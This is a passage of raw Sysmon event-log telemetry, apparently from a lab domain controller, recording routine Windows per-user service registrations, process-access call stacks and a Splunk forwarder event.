09:21:45.311{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624100C:\Windows\system32\services.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1dc37|C:\Windows\system32\services.exe+17f38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 13241300x80000000000000001055515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\Description@%%SystemRoot%%\system32\WpnUserService.dll,-2 13241300x80000000000000001055514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\FailureActionsBinary Data 13241300x80000000000000001055513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\Security\SecurityBinary Data 13241300x80000000000000001055512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\DisplayNameWindows Push Notifications User Service_8b358 13241300x80000000000000001055511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000001055510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\ErrorControlDWORD (0x00000000) 13241300x80000000000000001055509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\StartDWORD (0x00000003) 13241300x80000000000000001055508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_8b358\TypeDWORD (0x000000e0) 13241300x80000000000000001055507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-14000 13241300x80000000000000001055506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\FailureActionsBinary Data 13241300x80000000000000001055505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\Security\SecurityBinary Data 13241300x80000000000000001055504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\DisplayNameUser Data Access_8b358 13241300x80000000000000001055503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000001055502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\ErrorControlDWORD (0x00000000) 13241300x80000000000000001055501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\StartDWORD (0x00000003) 13241300x80000000000000001055500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_8b358\TypeDWORD (0x000000e0) 13241300x80000000000000001055499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-10002 13241300x80000000000000001055498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\FailureActionsBinary Data 13241300x80000000000000001055497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\Security\SecurityBinary Data 13241300x80000000000000001055496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\DisplayNameUser Data Storage_8b358 13241300x80000000000000001055495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\ImagePathC:\Windows\System32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000001055494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\ErrorControlDWORD (0x00000000) 13241300x80000000000000001055493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\StartDWORD (0x00000003) 13241300x80000000000000001055492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_8b358\TypeDWORD (0x000000e0) 13241300x80000000000000001055491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-15000 13241300x80000000000000001055490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\FailureActionsBinary Data 13241300x80000000000000001055489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\Security\SecurityBinary Data 13241300x80000000000000001055488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\DisplayNameContact Data_8b358 13241300x80000000000000001055487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000001055486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\ErrorControlDWORD (0x00000000) 13241300x80000000000000001055485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\StartDWORD (0x00000003) 13241300x80000000000000001055484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_8b358\TypeDWORD (0x000000e0) 13241300x80000000000000001055483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\Description@%%SystemRoot%%\system32\APHostRes.dll,-10001 13241300x80000000000000001055482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\FailureActionsBinary Data 13241300x80000000000000001055481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\Security\SecurityBinary Data 13241300x80000000000000001055480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\DisplayNameSync Host_8b358 13241300x80000000000000001055479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000001055478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\ErrorControlDWORD (0x00000000) 13241300x80000000000000001055477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\StartDWORD (0x00000002) 13241300x80000000000000001055476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_8b358\TypeDWORD (0x000000e0) 13241300x80000000000000001055475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\Description@%%SystemRoot%%\system32\cdpusersvc.dll,-101 10341000x80000000000000001055474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.296{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\FailureActionsBinary Data 13241300x80000000000000001055472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\Security\SecurityBinary Data 10341000x80000000000000001055471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.296{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.296{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.296{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\DisplayNameCDPUserSvc_8b358 13241300x80000000000000001055467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000001055466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\ErrorControlDWORD (0x00000001) 13241300x80000000000000001055465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1031,T1050SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\StartDWORD (0x00000002) 13241300x80000000000000001055464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:45.296{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_8b358\TypeDWORD (0x000000e0) 10341000x80000000000000001055463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.296{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.264{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FEFEBAB8CF2ACF913787944B483328,SHA256=CCC845090929411E680286DA272A6D7CF8FBBE0E5891ABFBA40B6CCDF2F16A21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.171{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.155{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001055459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.155{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000001055458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:45.155{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 10341000x80000000000000001055457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 